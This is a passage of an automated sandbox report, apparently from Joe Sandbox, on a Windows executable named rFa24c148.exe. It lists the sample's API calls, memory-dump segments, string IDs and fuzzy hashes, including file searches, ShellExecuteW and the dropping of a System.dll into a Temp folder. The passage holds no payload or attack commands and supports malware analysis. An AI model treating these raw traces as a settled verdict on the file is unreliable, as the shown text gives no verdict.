                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateInstance
                                                                                              • String ID: C:\Program Files (x86)\shaw
                                                                                              • API String ID: 542301482-209812835
                                                                                              • Opcode ID: 9427c6a701c92922babb39cdb8b7d9d670389baac5a1f16205eb8045a6f859ea
                                                                                              • Instruction ID: 320da03c4b58a6f492d73c9084ae0adc7b8dbf3defd95da7e5f41f6b65968188
                                                                                              • Opcode Fuzzy Hash: 9427c6a701c92922babb39cdb8b7d9d670389baac5a1f16205eb8045a6f859ea
                                                                                              • Instruction Fuzzy Hash: 74414E75A00105BFCB00DFA8C988EAE7BB5AF49318B20416AF905EF2D1DA79ED41CB55
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFindFirst
                                                                                              • String ID:
                                                                                              • API String ID: 1974802433-0
                                                                                              • Opcode ID: f42fc509a8610e2fd9ee7677f8d81a2a35df7b0b7b325dc4dc1c38febfc0d813
                                                                                              • Instruction ID: 81a3354c9c50dc932bc25f9396bfa9246b1e72d43aeb2e6b96ab1eceb958d047
                                                                                              • Opcode Fuzzy Hash: f42fc509a8610e2fd9ee7677f8d81a2a35df7b0b7b325dc4dc1c38febfc0d813
                                                                                              • Instruction Fuzzy Hash: 4CF05EB1A141149BDB00DFE4DD499EEB378FF04328F20497AE101F31D0D6B459409B2A
                                                                                              APIs
                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004041F7
                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0040420B
                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404228
                                                                                              • GetSysColor.USER32(?), ref: 00404239
                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404247
                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404255
                                                                                              • lstrlenW.KERNEL32(?), ref: 0040425A
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404267
                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040427C
                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 004042D5
                                                                                              • SendMessageW.USER32(00000000), ref: 004042DC
                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404307
                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040434A
                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00404358
                                                                                              • SetCursor.USER32(00000000), ref: 0040435B
                                                                                              • ShellExecuteW.SHELL32(0000070B,open,@qB,00000000,00000000,00000001), ref: 00404370
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0040437C
                                                                                              • SetCursor.USER32(00000000), ref: 0040437F
                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 004043AE
                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004043C0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                              • String ID: @qB$N$open
                                                                                              • API String ID: 3615053054-1317396031
                                                                                              • Opcode ID: 9f8ac8ff2f5d328cc3453d20dad54c1a32f190e354825bf3c7395e5a162293c3
                                                                                              • Instruction ID: bf3a58da35b54ffee1731227a2abeb8335aa36a287bc534981c9d3d9286f6950
                                                                                              • Opcode Fuzzy Hash: 9f8ac8ff2f5d328cc3453d20dad54c1a32f190e354825bf3c7395e5a162293c3
                                                                                              • Instruction Fuzzy Hash: F4718FB1A00209BFDB109F61DD85E6A7B79FB44354F00803AFA01B62D0D778AD61CFA9
                                                                                              APIs
                                                                                              • lstrcpyW.KERNEL32(00425D38,NUL,?,00000000,?,?,?,00405C39,?,?,00000001,004057B1,?,00000000,000000F1,?), ref: 00405AA5
                                                                                              • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405C39,?,?,00000001,004057B1,?,00000000,000000F1,?), ref: 00405AC9
                                                                                              • GetShortPathNameW.KERNEL32(00000000,00425D38,00000400), ref: 00405AD2
                                                                                                • Part of subcall function 00405948: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B82,00000000,[Rename],00000000,00000000,00000000), ref: 00405958
                                                                                                • Part of subcall function 00405948: lstrlenA.KERNEL32(00405B82,?,00000000,00405B82,00000000,[Rename],00000000,00000000,00000000), ref: 0040598A
                                                                                              • GetShortPathNameW.KERNEL32(?,00426538,00000400), ref: 00405AEF
                                                                                              • wsprintfA.USER32 ref: 00405B0D
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00426538,C0000000,00000004,00426538,?,?,?,?,?), ref: 00405B48
                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405B57
                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405B8F
                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425938,00000000,-0000000A,00409514,00000000,[Rename],00000000,00000000,00000000), ref: 00405BE5
                                                                                              • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405BF7
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00405BFE
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405C05
                                                                                                • Part of subcall function 004059E3: GetFileAttributesW.KERNELBASE(00000003,00402DA9,C:\Users\user\Desktop\rFa24c148.exe,80000000,00000003,?,?,?,00000000,00403425,?), ref: 004059E7
                                                                                                • Part of subcall function 004059E3: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403425,?), ref: 00405A09
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                              • String ID: %ls=%ls$8]B$8eB$NUL$[Rename]
                                                                                              • API String ID: 1265525490-2949686642
                                                                                              • Opcode ID: af31582807115e4b1434e021074788440192fe112e8d2dfb1a91ec7abac6484c
                                                                                              • Instruction ID: 0a051ccaee0c074b1a09a4e80aa922ec39551e5d9eafb60cec8afc598b306fa0
                                                                                              • Opcode Fuzzy Hash: af31582807115e4b1434e021074788440192fe112e8d2dfb1a91ec7abac6484c
                                                                                              • Instruction Fuzzy Hash: BC412671605B14BBE2206B215C49F6B7A6CDF45728F14003AF901F62D2D67CBD018EBD
                                                                                              APIs
                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                              • DrawTextW.USER32(00000000,004281A0,000000FF,00000010,00000820), ref: 00401156
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                              • String ID: F
                                                                                              • API String ID: 941294808-1304234792
                                                                                              • Opcode ID: 95dead6a558a01d4a5ec967a392ba08a15c3c6741a46ee5c6d7a895f4c731ce1
                                                                                              • Instruction ID: 4121dad2538bec1171c888a02065f78bbc92972143ed5d2ae8151d97d00695b6
                                                                                              • Opcode Fuzzy Hash: 95dead6a558a01d4a5ec967a392ba08a15c3c6741a46ee5c6d7a895f4c731ce1
                                                                                              • Instruction Fuzzy Hash: 68418A71804249AFDB058FA5DD459BFBBB9FF48310F00812AF951AA1A0C738EA51DFA5
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(?), ref: 10002391
                                                                                              • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100023B2
                                                                                              • CLSIDFromString.OLE32(?,00000000), ref: 100023BF
                                                                                              • GlobalAlloc.KERNEL32(00000040), ref: 100023DD
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023F8
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 1000241A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2062996466.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2062980489.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2063018747.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2063039760.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_10000000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$Alloc$ByteCharFreeFromMultiStringWidelstrlen
                                                                                              • String ID: @Hmu
                                                                                              • API String ID: 3579998418-887474944
                                                                                              • Opcode ID: d06520f5c61e510f0831b34fc4ed5dc6ae45d33c03c026c0edd8301773c2f489
                                                                                              • Instruction ID: 896c08f96dc03187adf01b888d28386c50d9513e33e57f95a3092ffc5e904c0a
                                                                                              • Opcode Fuzzy Hash: d06520f5c61e510f0831b34fc4ed5dc6ae45d33c03c026c0edd8301773c2f489
                                                                                              • Instruction Fuzzy Hash: A3419FB4504706EFF324DF249C94A6A77E8FB443D0F11892DF98AC6199CB34AA94CB61
                                                                                              APIs
                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\rFa24c148.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033B7), ref: 0040606E
                                                                                              • CharNextW.USER32(?,?,?,00000000), ref: 0040607D
                                                                                              • CharNextW.USER32(?,"C:\Users\user\Desktop\rFa24c148.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033B7), ref: 00406082
                                                                                              • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033B7), ref: 00406095
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Char$Next$Prev
                                                                                              • String ID: "C:\Users\user\Desktop\rFa24c148.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 589700163-560394690
                                                                                              • Opcode ID: 3b4e1c3ec424bf1de7da59c711653df59d062fb970fe0516104cac3d90234bf4
                                                                                              • Instruction ID: 5f8db4d4ef1aaeb388f58d13ad2a41ec80f6628d4c19804d17f22981d69c56f6
                                                                                              • Opcode Fuzzy Hash: 3b4e1c3ec424bf1de7da59c711653df59d062fb970fe0516104cac3d90234bf4
                                                                                              • Instruction Fuzzy Hash: 5311C45684121299DB30BB199C40BB7A2E8EF54790F52803FED8A733C1E77C5C9286BD
                                                                                              APIs
                                                                                              • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsnA538.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll,00000400,?,?,00000021), ref: 0040252F
                                                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsnA538.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll,00000400,?,?,00000021), ref: 00402536
                                                                                              • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                              • String ID: 8$C:\Users\user\AppData\Local\Temp\nsnA538.tmp$C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll
                                                                                              • API String ID: 1453599865-276241997
                                                                                              • Opcode ID: 7ff42c571deb340bf81926ce0c082dd5313d153aba56cb08d0eeabb960131028
                                                                                              • Instruction ID: 7a030a9c095cf7661290fe091fec1a729e70b9dbbd1292938289fd6a30d2cb41
                                                                                              • Opcode Fuzzy Hash: 7ff42c571deb340bf81926ce0c082dd5313d153aba56cb08d0eeabb960131028
                                                                                              • Instruction Fuzzy Hash: 18018071A04204FFD700AFA09E89EAF7378AB10319F20453BB202B61D1D6B85D419A2D
                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00404040
                                                                                              • GetSysColor.USER32(00000000), ref: 0040405C
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00404068
